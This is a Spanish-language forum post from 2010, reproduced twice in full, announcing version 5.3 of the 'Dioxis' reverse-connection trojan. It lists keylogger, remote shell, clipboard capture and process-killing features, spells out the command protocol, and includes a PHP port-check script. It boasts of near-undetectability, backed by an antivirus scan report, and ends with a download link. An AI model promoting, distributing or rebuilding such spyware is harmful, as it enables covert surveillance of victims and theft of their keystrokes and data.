50l3r
05-30-2010, 07:27 PM
http://img267.imageshack.us/img267/940/introp.jpg
___________________________________________
Tamaño Cliente: 1,64MB
Tamaño Servidor: 136KB
Infraestructura: red local e Internet
Lenguaje: Visual Basic 6.0
Licencia: Libre
Conexión: Multiconexion inversa
Idioma: Español
Tiempo de Reconexion del Server: 10 segundos
Puerto: Personalizado
___________________________________________
Ya estamos de nuevo con otra de las versiones de Dioxis, esta vez implementando a la multiconexion
Como muchos deseaban, dioxis queria que fuese un troyano multiconexion, pues tras unos dias de codeo se ha podido llegar a dar con la solucion y hemos puesto rumbo a la perfeccion, aunque aun queda demasiado
Esta version esta diseñada desde 0, se volvio a escribir el codigo entero, tomando bases de los antiguos y se consigio indetectar un poco
Por si fuera poca la ayuda que se presta a los usuarios, en la pestaña de ayuda, dioxis trae una opcion, que es la del boton de sincronizar, que permite mediante una redireccion a una pagina, saber si tu dioxis esta escuchando hacia el exterior o no, lo que hace este script es tomar tu direccion ip, el puerto por donde escuchas con el dioxis y hacer un envio de un paquete especial hacia el cliente, si se consigue conectar con el cliente es que tu conexion es satisfactoria, sino te tocara cacharrear con lso firewalls y servidores virtuales de tu enrutador
La interfaz nueva trae una herramienta de jerarquia simple, la cual te dice si estas escuchando, cerrado o coenctado con una maquina remota, todo un lujo
La interfaz de creacion del server trae una ayuda para el usuario tambien, asi como consejos que te ayudaran a que tu server este en perfecto estado
Bien, como ya os dije, se volvio a reescribir el codigo, el protocolo se cambio y ahora gira en torno a paquetes de 3 digitos numericos, el protocolo viene adjunto en el rar y os lo dejo a continuacion tambien, por si alguien usa el dioxis por terminal como yo
UNA NOTA A TENER EN CUENTA, ES QUE EN ESTA VERSION SE HAN QUITADO FUNCIONES MUY "CRACKER" QUE TENIA LA VERSION DE ABRIL NEGRO, YA QUE EL OBJETIVO NO ES CAUSAR DAÑOS COMO VEIS EN ESTA VERSION, AUNQUE CON IMAGINACION, QUE NO HACE FALTA MUCHA SE PUEDE
LA SEGUNDA NOTA ES QUE POR MEDIO DEL PAQUETE MAGICO "0-0" POR AMBOS LADOS, AL RECIBIR ESTE PAQUETE, EL HOST REMOTO SE APAGARA, POR MEDIDAS DE SEGURIDAD
Funciones:
* Terminal Remoto
* Chat Remoto
* Clipboard Remoto
* Keylogger
* Visor de Procesos
* Creación de Archivos Remotos
* Edición de nick y descripción
___________________________________________
Comprueba tu Dioxis 5.3
La nueva funcion para poder comprobar tu dioxis, si esta bien configurado para salir al exterior, usa un simple script para conectarse a dioxis por el puerto especificado, aqui os dejo el script
<?php
$puerto_remoto = $_GET['puerto'];
$ip = $_SERVER['REMOTE_ADDR'];
?>
<html>
<head>
<title>Comprueba tu Dioxis</title>
</head>
<body style="background:url(imagenes/fondo.jpg);">
<?php
if (trim($ip)!="" && trim($puerto_remoto) != "") {
@$conexion= fsockopen ($ip, $puerto_remoto);
if ($conexion) {
fputs($conexion,"636ON");
fclose ($conexion);
echo "<table width=100% height=90% align=center>
<td valign=middle align=center>
<img src=imagenes/conexion.png>
<br>
<img src=imagenes/evomon.png>
</td>
</table>";
}else{
echo "<table width=100% height=90% align=center>
<td valign=middle align=center>
<img src=imagenes/noconex.png>
</td>
</table>";
}}
echo "<b>Peticion realizada a traves de la IP: </b>" .$ip;
?>
</body>
</html>
la direccion de comprobacion es esta Comprueba tu Dioxis (http://50l3r-labs.skimdoo.com/Dioxis/mi-ip.php?puerto=puerto) donde puerto es el numero a comprobar, aun asi, dioxis te detecta el puerto a la escucha y ejecuta la pagina automaticamente, una prueba satisfactoria seria esta:
http://img256.imageshack.us/img256/5565/sinttulovm.png
Capturas:
http://img266.imageshack.us/img266/7775/30374.jpg
http://img143.imageshack.us/img143/6629/29399.jpg
http://img37.imageshack.us/img37/6610/25033.jpg
http://img88.imageshack.us/img88/9637/24915.jpg
http://img215.imageshack.us/img215/2461/22257.jpg
http://img198.imageshack.us/img198/996/21966.jpg
http://img46.imageshack.us/img46/1967/20398.jpg
http://img228.imageshack.us/img228/4483/18591.jpg
http://img153.imageshack.us/img153/4489/9806.jpg
http://img571.imageshack.us/img571/6273/4262.jpg
Protocolo:
Server:
001: procesos
002: matar procesos
005: Refescar keylogger
007: Cerrar chat
008: Abrir chat
011: <<.>>RUTA<<.>>DATOS:Crear archivo
012: Desactivar Troyano para la siguiente sesion
013GET-DESCRIPCION: refrescar la descripcion de la maquina
013GET-NICK: refrescar el nick de la maquina
013SET-DESCRIPCION<<.>>descripcion: establecer descripcion
013SET-NICK<<.>>nick: establecer nick
124: recibir nick y descripcion, va seguido de 123
Cliente:
003PROCESOS: lista de procesos
004PROCESO: verificacion de matanza de proceso, :FALSE: si no se mato
006: Logs de teclas keylogger
009: Señal de chat abierto
014GET-NICK<<.>>nick: recibiendo nick
014GET-DESCRIPCION<<.>>descripcion: recibiendo descripcion
015TEXTO: Clipboard remoto
Ambos:
123: Establecer conexion
010: recibiendo mensaje chat
333Shell: Shell Remota
0-0: Apagando el ejecutable
Deteccion:
File Info
Report date: 2010-05-31 00:24:16 (GMT 1)
File name: Dioxis_5.3_by_50l3r.exe
File size: 1728525 bytes
MD5 Hash: 1db3914c1d2e070b2d399bc62fc8ff3d
SHA1 Hash: 7d10c9d82efed5ccb177f8588c75f3d2b1af3f4a
Detection rate: 2 on 19 (11%)
Status: INFECTED
Detections
a-squared - -
Avast - -
AVG - -
Avira AntiVir - TR/Dropper.Gen
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - W32/VB-Backdoor-ESVR-based!Maximus
G-Data - -
Ikarus T3 - -
Kaspersky - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -
Scan report generated by
NoVirusThanks.org (http://novirusthanks.org)
MANUAL SOBRE COMO CONFIGURAR EL SERVIDOR EN EL INTERIOR DEL RAR
http://www.rogueamoeba.com/global/images/downloadIcon.png (http://www.fileden.com/files/2008/3/2/1791774/Dioxis%205.3%20by%2050l3r.rar)
___________________________________________
Tamaño Cliente: 1,64MB
Tamaño Servidor: 136KB
Infraestructura: red local e Internet
Lenguaje: Visual Basic 6.0
Licencia: Libre
Conexión: Multiconexion inversa
Idioma: Español
Tiempo de Reconexion del Server: 10 segundos
Puerto: Personalizado
___________________________________________
Ya estamos de nuevo con otra de las versiones de Dioxis, esta vez implementando a la multiconexion
Como muchos deseaban, dioxis queria que fuese un troyano multiconexion, pues tras unos dias de codeo se ha podido llegar a dar con la solucion y hemos puesto rumbo a la perfeccion, aunque aun queda demasiado
Esta version esta diseñada desde 0, se volvio a escribir el codigo entero, tomando bases de los antiguos y se consigio indetectar un poco
Por si fuera poca la ayuda que se presta a los usuarios, en la pestaña de ayuda, dioxis trae una opcion, que es la del boton de sincronizar, que permite mediante una redireccion a una pagina, saber si tu dioxis esta escuchando hacia el exterior o no, lo que hace este script es tomar tu direccion ip, el puerto por donde escuchas con el dioxis y hacer un envio de un paquete especial hacia el cliente, si se consigue conectar con el cliente es que tu conexion es satisfactoria, sino te tocara cacharrear con lso firewalls y servidores virtuales de tu enrutador
La interfaz nueva trae una herramienta de jerarquia simple, la cual te dice si estas escuchando, cerrado o coenctado con una maquina remota, todo un lujo
La interfaz de creacion del server trae una ayuda para el usuario tambien, asi como consejos que te ayudaran a que tu server este en perfecto estado
Bien, como ya os dije, se volvio a reescribir el codigo, el protocolo se cambio y ahora gira en torno a paquetes de 3 digitos numericos, el protocolo viene adjunto en el rar y os lo dejo a continuacion tambien, por si alguien usa el dioxis por terminal como yo
UNA NOTA A TENER EN CUENTA, ES QUE EN ESTA VERSION SE HAN QUITADO FUNCIONES MUY "CRACKER" QUE TENIA LA VERSION DE ABRIL NEGRO, YA QUE EL OBJETIVO NO ES CAUSAR DAÑOS COMO VEIS EN ESTA VERSION, AUNQUE CON IMAGINACION, QUE NO HACE FALTA MUCHA SE PUEDE
LA SEGUNDA NOTA ES QUE POR MEDIO DEL PAQUETE MAGICO "0-0" POR AMBOS LADOS, AL RECIBIR ESTE PAQUETE, EL HOST REMOTO SE APAGARA, POR MEDIDAS DE SEGURIDAD
Funciones:
* Terminal Remoto
* Chat Remoto
* Clipboard Remoto
* Keylogger
* Visor de Procesos
* Creación de Archivos Remotos
* Edición de nick y descripción
___________________________________________
Comprueba tu Dioxis 5.3
La nueva funcion para poder comprobar tu dioxis, si esta bien configurado para salir al exterior, usa un simple script para conectarse a dioxis por el puerto especificado, aqui os dejo el script
<?php
$puerto_remoto = $_GET['puerto'];
$ip = $_SERVER['REMOTE_ADDR'];
?>
<html>
<head>
<title>Comprueba tu Dioxis</title>
</head>
<body style="background:url(imagenes/fondo.jpg);">
<?php
if (trim($ip)!="" && trim($puerto_remoto) != "") {
@$conexion= fsockopen ($ip, $puerto_remoto);
if ($conexion) {
fputs($conexion,"636ON");
fclose ($conexion);
echo "<table width=100% height=90% align=center>
<td valign=middle align=center>
<img src=imagenes/conexion.png>
<br>
<img src=imagenes/evomon.png>
</td>
</table>";
}else{
echo "<table width=100% height=90% align=center>
<td valign=middle align=center>
<img src=imagenes/noconex.png>
</td>
</table>";
}}
echo "<b>Peticion realizada a traves de la IP: </b>" .$ip;
?>
</body>
</html>
la direccion de comprobacion es esta Comprueba tu Dioxis (http://50l3r-labs.skimdoo.com/Dioxis/mi-ip.php?puerto=puerto) donde puerto es el numero a comprobar, aun asi, dioxis te detecta el puerto a la escucha y ejecuta la pagina automaticamente, una prueba satisfactoria seria esta:
http://img256.imageshack.us/img256/5565/sinttulovm.png
Capturas:
http://img266.imageshack.us/img266/7775/30374.jpg
http://img143.imageshack.us/img143/6629/29399.jpg
http://img37.imageshack.us/img37/6610/25033.jpg
http://img88.imageshack.us/img88/9637/24915.jpg
http://img215.imageshack.us/img215/2461/22257.jpg
http://img198.imageshack.us/img198/996/21966.jpg
http://img46.imageshack.us/img46/1967/20398.jpg
http://img228.imageshack.us/img228/4483/18591.jpg
http://img153.imageshack.us/img153/4489/9806.jpg
http://img571.imageshack.us/img571/6273/4262.jpg
Protocolo:
Server:
001: procesos
002: matar procesos
005: Refescar keylogger
007: Cerrar chat
008: Abrir chat
011: <<.>>RUTA<<.>>DATOS:Crear archivo
012: Desactivar Troyano para la siguiente sesion
013GET-DESCRIPCION: refrescar la descripcion de la maquina
013GET-NICK: refrescar el nick de la maquina
013SET-DESCRIPCION<<.>>descripcion: establecer descripcion
013SET-NICK<<.>>nick: establecer nick
124: recibir nick y descripcion, va seguido de 123
Cliente:
003PROCESOS: lista de procesos
004PROCESO: verificacion de matanza de proceso, :FALSE: si no se mato
006: Logs de teclas keylogger
009: Señal de chat abierto
014GET-NICK<<.>>nick: recibiendo nick
014GET-DESCRIPCION<<.>>descripcion: recibiendo descripcion
015TEXTO: Clipboard remoto
Ambos:
123: Establecer conexion
010: recibiendo mensaje chat
333Shell: Shell Remota
0-0: Apagando el ejecutable
Deteccion:
File Info
Report date: 2010-05-31 00:24:16 (GMT 1)
File name: Dioxis_5.3_by_50l3r.exe
File size: 1728525 bytes
MD5 Hash: 1db3914c1d2e070b2d399bc62fc8ff3d
SHA1 Hash: 7d10c9d82efed5ccb177f8588c75f3d2b1af3f4a
Detection rate: 2 on 19 (11%)
Status: INFECTED
Detections
a-squared - -
Avast - -
AVG - -
Avira AntiVir - TR/Dropper.Gen
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - W32/VB-Backdoor-ESVR-based!Maximus
G-Data - -
Ikarus T3 - -
Kaspersky - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -
Scan report generated by
NoVirusThanks.org (http://novirusthanks.org)
MANUAL SOBRE COMO CONFIGURAR EL SERVIDOR EN EL INTERIOR DEL RAR
http://www.rogueamoeba.com/global/images/downloadIcon.png (http://www.fileden.com/files/2008/3/2/1791774/Dioxis%205.3%20by%2050l3r.rar)